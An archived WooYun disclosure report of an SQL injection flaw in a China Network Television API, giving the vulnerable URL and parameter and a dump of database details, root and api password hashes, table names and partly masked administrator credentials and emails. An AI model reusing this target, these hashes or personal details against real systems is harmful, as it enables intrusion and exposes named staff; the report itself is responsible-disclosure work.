中国网络电视台某处SQL注射漏洞 | wooyun-2013-046188| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046188

漏洞标题：中国网络电视台某处SQL注射漏洞

漏洞作者： se55i0n

提交时间：2013-12-17 16:57

修复时间：2014-01-31 16:58

公开时间：2014-01-31 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-17：细节已通知厂商并且等待厂商处理中
2013-12-17：厂商已经确认，细节仅向厂商公开
2013-12-27：细节向核心白帽子及相关领域专家公开
2014-01-06：细节向普通白帽子公开
2014-01-16：细节向实习白帽子公开
2014-01-31：细节向公众公开

简要描述：

详细说明：

1）测试注入点如下，存在注入的参数为columnid；

http://api.cbox.cntv.cn/api/column_detail?pid=ukztYUybsWanMQcNKADef2gE9piG4h6d&version=1.0.4&columnid=C10336

2）数据库相关信息；

DB Server: MySQL >=5
Current User: 	api@cms24
Sql Version: 	5.1.61-log
Current DB: 	mvs
System User: 	[email protected]
Host Name: 	cboxup9
DB User & Pass: 	root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:localhost
		api:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.7.3.%
Data Bases: 	information_schema
		mvs
		mysql
		test

相关表信息：

VMS_COLUMN 	
VMS_COLUMN_PENDING 	
VMS_VIDEOINFO 	
VMS_VIDEOINFO_PENDING 	
VMS_VIDEOSET 	
VMS_VIDEOSET_PENDING 	
VMS_VIDEOSET_VIDEO_RELATION 	
VMS_VIDEOSET_VIDEO_RELATION_PENDING 	
YXG_CHANNEL 	
mvs_area 	
mvs_channel 	
mvs_client 	
mvs_client_home_subject 	
mvs_client_television_stream 	
mvs_client_type 	
mvs_client_version 	
mvs_client_version_channel 	
mvs_content_type 	
mvs_device 	
mvs_epg 	
mvs_feedback 	
mvs_feedback_video 	
mvs_focus_video 	
mvs_home_subject 	
mvs_home_subject_content 	
mvs_media_type 	
mvs_out_service_template 	
mvs_player_recommend_content 	
mvs_push_msg 	
mvs_right 	
mvs_role 	
mvs_role_right_relation 	
mvs_second_channel 	
mvs_stat_area 	
mvs_stat_basic 	
mvs_stat_search 	
mvs_stat_video 	
mvs_subject_type 	
mvs_syslogs 	
mvs_syslogs_optype 	
mvs_television_station 	
mvs_user 	
mvs_year 	
stat_navigationbar 	
stat_search 	
stat_startup 	
stat_video 	
stat_vv

管理员信息：

id 	user_name 	user_password 	user_email
5 	caojundan 	xxxxx3456 	[email protected]
11 	zhaoxuesong 	cxxxxxxer... 	[email protected]
14 	wangxinli 	qwxxxxx) 	[email protected]
15 	zhangjianan 	4exxxxxtiao 	[email protected]
16 	rentao  	Cb0xxxxx3 	[email protected]
17 	tanxiaoqiang 	Cbxxxxx3 	[email protected]

漏洞证明：

见详细说明

修复方案：

过滤

版权声明：转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-12-17 17:21

厂商回复：

非常感谢，我们将尽快进行该业务的整改！～～感谢您对我们的支持和帮助！～～～

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046188

漏洞标题：中国网络电视台某处SQL注射漏洞

相关厂商：中国网络电视台

漏洞作者： se55i0n

提交时间：2013-12-17 16:57

修复时间：2014-01-31 16:58

公开时间：2014-01-31 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046188

漏洞标题：中国网络电视台某处SQL注射漏洞

相关厂商：中国网络电视台

漏洞作者： se55i0n

提交时间：2013-12-17 16:57

修复时间：2014-01-31 16:58

公开时间：2014-01-31 16:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-046188"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：